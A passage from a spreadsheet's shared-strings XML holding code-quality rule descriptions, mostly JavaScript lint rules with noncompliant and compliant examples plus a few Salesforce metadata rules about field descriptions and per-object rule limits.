xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;\n      &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.\n      &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;\n      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n      &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;\n  ..........\n&amp;lt;/CustomField&amp;gt;\n     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sfmeta:ExceedsMaxAllowedComponentsPerType</t>
  </si>
  <si>
    <t>Avoid Excess Components for Objects</t>
  </si>
  <si>
    <t>This rule helps to limit the number of sharing, workflow and validation rules that can be created\n on an object. This ensures that the components will not be overloading the system by doing extensive calculations\n whenever a record is created or updated.\n&lt;br/&gt;\n&lt;br/&gt;\nDefault Limits&lt;br/&gt;\nSharing rules should not be more than specified limit per object.\nDefault Limit: 19 per objects.\n&lt;br/&gt;\nActive validation rules should not be more than specified limit per object.\nDefault Limit: 10 per objects.\n&lt;br/&gt;\nActive Workflow rules should not be more than specified limit per object.\nDefault Limit: 10 per objects.\n&lt;br/&gt;\nInactive Validation rules should not be more than specified limit per object.\nDefault Limit: 3 per objects.\n&lt;br/&gt;\nInactive Workflow rules should not be more than specified limit per object.\nDefault Limit: 3 per objects.\n&lt;br/&gt;\n&lt;br/&gt;\nSteps to resolve\n&lt;br/&gt;\nRemove the rules which are redundant or obsolete.</t>
  </si>
  <si>
    <t>Custom fields should have a description of their function to avoid confusion.\n\nThis rule requires .object or .field-meta.xml metadata files to be downloaded.\n     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n    &amp;lt;fields&amp;gt;\n        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.\n        &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;\n        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n        &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;\n    &amp;lt;/fields&amp;gt;\n  ..........\n&amp;lt;/CustomObject&amp;gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n    &amp;lt;fields&gt;\n        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;\n        &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.\n        &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;\n        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n        &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;\n    &amp;lt;/fields&amp;gt;\n  ..........\n&amp;lt;/CustomObject&amp;gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.\n      &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;\n      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n      &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;\n  ..........\n&amp;lt;/CustomField&amp;gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;\n      &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.\n      &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;\n      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n      &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;\n  ..........\n&amp;lt;/CustomField&amp;gt;\n     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Declaring a variable only to immediately return or throw it is a bad practice.&lt;/p&gt;\n&lt;p&gt;Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction computeDurationInMilliseconds() {\n  var duration = (((hours * 60) + minutes) * 60 + seconds ) * 1000 ;\n  return duration;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction computeDurationInMilliseconds() {\n  return (((hours * 60) + minutes) * 60 + seconds ) * 1000 ;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;In a Zen-like manner, &lt;code&gt;NaN&lt;/code&gt; isn't equal to anything, even itself. So comparisons (&lt;code&gt;&amp;gt;, &amp;lt;, &amp;gt;=, &amp;lt;=&lt;/code&gt;) where one\noperand is &lt;code&gt;NaN&lt;/code&gt; or evaluates to &lt;code&gt;NaN&lt;/code&gt; always return &lt;code&gt;false&lt;/code&gt;. Specifically, &lt;code&gt;undefined&lt;/code&gt; and objects that\ncannot be converted to numbers evaluate to &lt;code&gt;NaN&lt;/code&gt; when used in numerical comparisons.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is &lt;code&gt;NaN&lt;/code&gt;,\n&lt;code&gt;undefined&lt;/code&gt; or an &lt;code&gt;Object&lt;/code&gt; which cannot be converted to a number.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar x;  // x is currently "undefined"\nif (someCondition()) {\n  x = 42;\n}\n\nif (42 &amp;gt; x) {  // Noncompliant; "x" might still be "undefined"\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj &amp;gt; 24) { // Noncompliant\n  doSomething();\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar x;\nif (someCondition()) {\n  x = 42;\n} else {\n  x = foo();\n}\n\nif (42 &amp;gt; x) {\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop &amp;gt; 24) {\n  doSomething();\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1516</t>
  </si>
  <si>
    <t>&lt;p&gt;Continuing a string across a linebreak is supported in most script engines, but it is not a part of ECMAScript. Additionally, the whitespace at the\nbeginning of each line can't be safely stripped at compile time, and any whitespace after the slash will result in tricky errors.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar myString = 'A rather long string of English text, an error message \\n                actually that just keeps going and going -- an error \\n                message to make the Energizer bunny blush (right through \\n                those Schwarzenegger shades)! Where was I? Oh yes, \\n                you\'ve got an error and all the extraneous whitespace is \\n                just gravy.  Have a nice day.';  // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar myString = 'A rather long string of English text, an error message ' +\n    'actually that just keeps going and going -- an error ' +\n    'message to make the Energizer bunny blush (right through ' +\n    'those Schwarzenegger shades)! Where was I? Oh yes, ' +\n    'you\'ve got an error and all the extraneous whitespace is ' +\n    'just gravy.  Have a nice day.';\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;ECMAScript 2015 introduced the &lt;code&gt;let&lt;/code&gt; and &lt;code&gt;const&lt;/code&gt; keywords for block-scope variable declaration. Using &lt;code&gt;const&lt;/code&gt;\ncreates a read-only (constant) variable.&lt;/p&gt;\n&lt;p&gt;The distinction between the variable types created by &lt;code&gt;var&lt;/code&gt; and by &lt;code&gt;let&lt;/code&gt; is significant, and a switch to &lt;code&gt;let&lt;/code&gt;\nwill help alleviate many of the variable scope issues which have caused confusion in the past. &lt;/p&gt;\n&lt;p&gt;Because these new keywords create more precise variable types, they are preferred in environments that support ECMAScript 2015. However, some\nrefactoring may be required by the switch from &lt;code&gt;var&lt;/code&gt; to &lt;code&gt;let&lt;/code&gt;, and you should be aware that they raise &lt;code&gt;SyntaxError&lt;/code&gt;s\nin pre-ECMAScript 2015 environments.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when &lt;code&gt;var&lt;/code&gt; is used instead of &lt;code&gt;const&lt;/code&gt; or &lt;code&gt;let&lt;/code&gt;.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar color = "blue";\nvar size = 4;\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nconst color = "blue";\nlet size = 4;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;It can be extremely confusing when a &lt;code&gt;for&lt;/code&gt; loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (i = 0; i &amp;lt; 10; j++) { // Noncompliant\n  // ...\n  i++;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfor (i = 0; i &amp;lt; 10; i++, j++) {\n  // ...\n}\n&lt;/pre&gt;\n&lt;p&gt;Or &lt;/p&gt;\n&lt;pre&gt;\nfor (i = 0; i &amp;lt; 10; i++) {\n  // ...\n  j++;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Creating a new &lt;code&gt;Error&lt;/code&gt; without actually throwing it is useless and is probably due to a mistake.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (x &amp;lt; 0) {\n  new Error("x must be nonnegative");\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (x &amp;lt; 0) {\n  throw new Error("x must be nonnegative");\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Variables declared with &lt;code&gt;const&lt;/code&gt; cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nconst pi = "yes, please";\npi = 3.14;  // Noncompliant\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The comma operator (&lt;code&gt;,&lt;/code&gt;) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a &lt;code&gt;switch&lt;/code&gt; &lt;code&gt;case&lt;/code&gt;. You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.&lt;/p&gt;\n&lt;p&gt;Similarly the logical OR operator (&lt;code&gt;||&lt;/code&gt;) will not work in a &lt;code&gt;switch&lt;/code&gt; &lt;code&gt;case&lt;/code&gt;, only the first argument will be\nconsidered at execution time.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nswitch a {\n  case 1,2:  // Noncompliant; only 2 is ever handled by this case\n    doTheThing(a);\n  case 3 || 4: // Noncompliant; only '3' is handled\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log("Neener, neener!");  // this happens when a==1 or a == 4\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nswitch a {\n  case 1:\n  case 2:\n    doTheThing(a);\n  case 3:\n  case 4:\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log("Neener, neener!");\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Unlike strongly typed languages, JavaScript does not enforce a return type on a function. This means that different paths through a function can\nreturn different types of values, which can be very confusing to the user and significantly harder to maintain.&lt;/p&gt;\n&lt;p&gt;In particular a function, in JavaScript, will return &lt;code&gt;undefined&lt;/code&gt; in any of the following cases:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; It exits without a &lt;code&gt;return&lt;/code&gt; statement. &lt;/li&gt;\n  &lt;li&gt; It executes a &lt;code&gt;return&lt;/code&gt; with no value. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;This rule verifies that return values are either always or never specified for each path through a function.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo(a) { // Noncompliant, function exits without "return"\n  if (a == 1) {\n    return true;\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo(a) {\n  if (a == 1) {\n    return true;\n  }\n  return false;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Functions declared with the &lt;code&gt;set&lt;/code&gt; keyword will automatically return the values they were passed. Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar person = {\n  // ...\n  set name(name) {\n    this.name = name;\n    return 42;  // Noncompliant\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar person = {\n  // ...\n  set name(name) {\n    this.name = name;\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Comparing dissimilar types using the strict equality operators &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; will always return the same value,\nrespectively &lt;code&gt;false&lt;/code&gt; and &lt;code&gt;true&lt;/code&gt;, because no type conversion is done before the comparison. Thus, such comparisons can only be\nbugs.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar a = 8;\nvar b = "8";\n\nif (a === b) {  // Noncompliant; always false\n  // ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar a = 8;\nvar b = "8";\n\nif (a == b) {\n  // ...\n}\n&lt;/pre&gt;\n&lt;p&gt;or&lt;/p&gt;\n&lt;pre&gt;\nvar a = 8;\nvar b = "8";\n\nif (a === Number(b)) {\n  // ...\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S107</t>
  </si>
  <si>
    <t>&lt;p&gt;A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;p&gt;With a maximum number of 4 parameters:&lt;/p&gt;\n&lt;pre&gt;\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The transitive property says that if &lt;code&gt;a == b&lt;/code&gt; and &lt;code&gt;b == c&lt;/code&gt;, then &lt;code&gt;a == c&lt;/code&gt;. In such cases, there's no point in\nassigning &lt;code&gt;a&lt;/code&gt; to &lt;code&gt;c&lt;/code&gt; or vice versa because they're already equivalent. &lt;/p&gt;\n&lt;p&gt;This rule raises an issue when an assignment is useless because the assigned-to variable already holds the value on all execution paths.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\na = b;\nc = a;\nb = c; // Noncompliant: c and b are already the same\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\na = b;\nc = a;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;parseInt&lt;/code&gt; function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nparseInt("010");  // Noncompliant; pre-2013 browsers may return 8\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nparseInt("010", 10);\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when a function contains several &lt;code&gt;return&lt;/code&gt; statements that all return the same value.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo(a) {  // Noncompliant\n  let b = 12;\n  if (a) {\n    return b;\n  }\n  return b;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return &lt;code&gt;false&lt;/code&gt;).&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nconst isTooSmall = Math.abs(x &amp;lt; 0.0042);\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nconst isTooSmall = Math.abs(x) &amp;lt; 0.0042;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Boolean literals should be avoided in comparison expressions &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt; to improve code readability.&lt;/p&gt;\n&lt;p&gt;This rule also reports on redundant boolean operations.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet someValue = "0";\n// ...\n\nif (someValue == true) { /* ... */ }\nif (someBooleanValue != true) { /* ... */ }\ndoSomething(!false);\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (someValue &amp;amp;&amp;amp; someValue != "0") { /* ... */ }\nif (!someBooleanValue) { /* ... */ }\ndoSomething(true);\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;in&lt;/code&gt; operator tests whether the specified property is in the specified object.&lt;/p&gt;\n&lt;p&gt;If the right operand is a of primitive type (i.e., not an object) the &lt;code&gt;in&lt;/code&gt; operator raises a &lt;code&gt;TypeError&lt;/code&gt;.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar x = "Foo";\n"length" in x; // Noncompliant: TypeError\n0 in x;        // Noncompliant: TypeError\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar x = new String("Foo");\n"length" in x;    // true\n0 in x;           // true\n"foobar" in x;    // false\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Mixing up the order of operations will almost always yield unexpected results.&lt;/p&gt;\n&lt;p&gt;Similarly, mis-applied negation will also yield bad results. For instance consider the difference between &lt;code&gt;!key in dict&lt;/code&gt; and &lt;code&gt;!(key\nin dict)&lt;/code&gt;. The first looks for a boolean value (&lt;code&gt;!key&lt;/code&gt;) in &lt;code&gt;dict&lt;/code&gt;, and the other looks for a string and inverts the\nresult. &lt;code&gt;!obj instanceof SomeClass&lt;/code&gt; has the same problem.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when the left operand of an &lt;code&gt;in&lt;/code&gt; or &lt;code&gt;instanceof&lt;/code&gt; operator is negated.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (!"prop" in myObj) {  // Noncompliant;  "in" operator is checking property "false"\n  doTheThing();  // this block will be never executed\n}\n\nif (!foo instanceof MyClass) {  // Noncompliant; "!foo" returns a boolean, which is not an instance of anything\n  doTheOtherThing();  // this block is never executed\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (!("prop" in myObj)) {\n  doTheThing();\n}\n\nif (!(foo instanceof MyClass)) {\n  doTheOtherThing();\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when empty destructuring pattern is used.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar {a: {}, b} = myObj; // Noncompliant\nfunction foo({first: [], second}) { // Noncompliant\n  // ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n  // ...\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When the keyword &lt;code&gt;this&lt;/code&gt; is used outside of an object, it refers to the global &lt;code&gt;this&lt;/code&gt; object, which is the same thing as the\n&lt;code&gt;window&lt;/code&gt; object in a standard web page. Such uses could be confusing to maintainers. Instead, simply drop the &lt;code&gt;this&lt;/code&gt;, or replace\nit with &lt;code&gt;window&lt;/code&gt;; it will have the same effect and be more readable.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nthis.foo = 1;   // Noncompliant\nconsole.log(this.foo); // Noncompliant\n\nfunction MyObj() {\n  this.foo = 1; // Compliant\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) { // Compliant\n    // ...\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n  this.foo = 1;\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) {\n    // ...\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1539</t>
  </si>
  <si>
    <t>&lt;p&gt;Even though it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction strict() {\n  'use strict';\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Constructor functions, which create new object instances, must only be called with &lt;code&gt;new&lt;/code&gt;. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction getNum() {\n  return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n  this.numeric = numeric;\n  this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum();  // Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num();  // Noncompliant. undefined is returned, NOT an object\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction divide(divisor, dividend) {\n  return divisor/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(dividend, divisor);  // Noncompliant; operation succeeds, but result is unexpected\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction divide(divisor, dividend) {\n  return divisor/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(divisor, dividend);\n  //...\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;TODO&lt;/code&gt; tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.&lt;/p&gt;\n&lt;p&gt;Sometimes the developer will not have the time or will simply forget to get back to that tag.&lt;/p&gt;\n&lt;p&gt;This rule is meant to track those tags and to ensure that they do not go unnoticed.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction doSomething() {\n  // TODO\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/546.html"&gt;MITRE, CWE-546&lt;/a&gt; - Suspicious Comment &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;FIXME&lt;/code&gt; tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.&lt;/p&gt;\n&lt;p&gt;Sometimes the developer will not have the time or will simply forget to get back to that tag.&lt;/p&gt;\n&lt;p&gt;This rule is meant to track those tags and to ensure that they do not go unnoticed.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction divide(numerator, denominator) {\n  return numerator / denominator;              // FIXME denominator value might be  0\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/546.html"&gt;MITRE, CWE-546&lt;/a&gt; - Suspicious Comment &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S113</t>
  </si>
  <si>
    <t>&lt;p&gt;Some tools work better when files end with an empty line.&lt;/p&gt;\n&lt;p&gt;This rule simply generates an issue if it is missing.&lt;/p&gt;\n&lt;p&gt;For example, a Git diff looks like this if the empty line is missing at the end of the file:&lt;/p&gt;\n&lt;pre&gt;\n+class Test {\n+}\n\ No newline at end of file\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule checks that a declaration doesn't use a name that is already in use. Indeed, it is possible to use the same symbol multiple times as\neither a variable or a function, but doing so is likely to confuse maintainers. Further it's possible that such reassignments are made in error, with\nthe developer not realizing that the value of the variable is overwritten by the new assignment.&lt;/p&gt;\n&lt;p&gt;This rule also applies to function parameters.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar a = 'foo';\nfunction a() {}   // Noncompliant\nconsole.log(a);   // prints "foo"\n\nfunction myFunc(arg) {\n  var arg = "event"; // Noncompliant, argument value is lost\n}\n\nfun(); // prints "bar"\n\nfunction fun() {\n  console.log("foo");\n}\n\nfun(); // prints "bar"\n\nfunction fun() {  // Noncompliant\n  console.log("bar");\n}\n\nfun(); // prints "bar"\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar a = 'foo';\nfunction otherName() {}\nconsole.log(a);\n\nfunction myFunc(arg) {\n  var newName = "event";\n}\n\nfun(); // prints "foo"\n\nfunction fun() {\n  print("foo");\n}\n\nfun(); // prints "foo"\n\nfunction printBar() {\n  print("bar");\n}\n\nprintBar(); // prints "bar"\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript variable scope can be particularly difficult to understand and get right. The situation gets even worse when you consider the\n&lt;em&gt;accidental&lt;/em&gt; creation of global variables, which is what happens when you declare a variable inside a function or the &lt;code&gt;for&lt;/code&gt; clause\nof a for-loop without using the &lt;code&gt;let&lt;/code&gt;, &lt;code&gt;const&lt;/code&gt; or &lt;code&gt;var&lt;/code&gt; keywords. &lt;/p&gt;\n&lt;p&gt;&lt;code&gt;let&lt;/code&gt; and &lt;code&gt;const&lt;/code&gt; were introduced in ECMAScript 2015, and are now the preferred keywords for variable declaration.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction f(){\n  i = 1;         // Noncompliant; i is global\n\n  for (j = 0; j &amp;lt; array.length; j++) {  // Noncompliant; j is global now too\n    // ...\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction f(){\n  var i = 1;\n\n  for (let j = 0; j &amp;lt; array.length; j++) {\n    // ...\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
